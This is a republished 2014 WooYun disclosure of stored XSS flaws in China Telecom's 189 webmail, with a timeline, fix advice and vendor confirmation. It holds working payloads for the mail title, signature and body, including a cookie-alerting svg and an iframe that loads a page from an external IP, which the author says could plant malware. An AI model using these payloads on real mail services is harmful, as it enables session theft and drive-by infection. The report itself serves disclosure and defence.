[公开漏洞]中国电信189邮箱多处存储型XSS漏洞

    来源:WooYun 浏览:674次 时间:2014-07-15
中国电信189邮箱多处存储型XSS漏洞 相关厂商: 中国电信 漏洞作者:nextdoor 提交时间:2014-05-28 18:22 公开时间:2014-07-12 18:22 漏洞类型:xss跨站脚本攻击 危害等级:中 自评Rank:15 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: 持久型xss 存储型xss XSS 漏洞详情 披露状态:

2014-05-28:细节已通知厂商并且等待厂商处理中
2014-06-01:厂商已经确认,细节仅向厂商公开
2014-06-11:细节向核心白帽子及相关领域专家公开
2014-06-21:细节向普通白帽子公开
2014-07-01:细节向实习白帽子公开
2014-07-12:细节向公众公开

简要描述:

中国电信189邮箱多处存储型XSS漏洞

详细说明:

中国电信189邮箱多处存储型的跨站漏洞



描述:

电信189邮箱在过滤on事件(仅仅在标签中才过滤,不在标签的不过滤),

还有javascript,data和expssion等标签,很难绕过,很头疼。

A.先来一个mxss漏洞

这样原因是在正文中过滤了,在标题中未过滤,且标题的过滤可以被轻松绕过

利用代码

<img src=1 onerror=alert(888) >
&lt;svg onload="alert(document.cookie)"></svg&gt;
aaaaaa&lt;i onmouseover=alert(1)&gt;aaaa



如图所示

d1PNG.PNG



打开邮件漏洞直接触发

a3.PNG



其他标签就可使用<div><i>和<svg>

这个i标签必须回复转发下且鼠标在数字上触发,

a4.PNG



a5.PNG



svg下自动触发

a6.PNG





b.这个漏洞是在签名处,由于在插入链接时可以闭合<a>标签,从而插入<iframe>标签

利用代码

<IFRAME SRC="javascript:alert(27);"></IFRAME>



测试过程

123.PNG



漏洞回复,转发时触发

6.PNG



代码代码执行

a10.PNG







c.正文和快速回复处

它们未过滤iframe这个危险的标签。

且iframe只有进入一个外部的html文件就可以了,这个还可以挂马,危害很大

利用代码

<IFRAME SRC="http://182.124.1.1:8088/2.html"></IFRAME>



1.PNG



漏洞回复转发触发

a9.PNG



代码执行

a11.PNG



快速回复中可以插入iframe,测试有效,不在贴图证明



总结:过滤时要完全啊。盗取cookie的过程就是把执行的代码换成我们的js代码,

不在详述。

漏洞证明:

漏洞证明

a9.PNG

修复方案:

漏洞防御:

1.对于xmss漏洞,正文中怎样过滤,标题中也怎样过滤



2.对签名处,正文处怎样过滤,签名处怎样过滤



3.正文和回复中,对iframe标签过滤

版权声明:转载请注明来源 nextdoor@乌云

漏洞回应 厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2014-06-01 23:28

厂商回复:

CNVD确认并复现所述情况,转由CNCERT协调中国电信集团公司通报处置。

最新状态:

暂无

当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细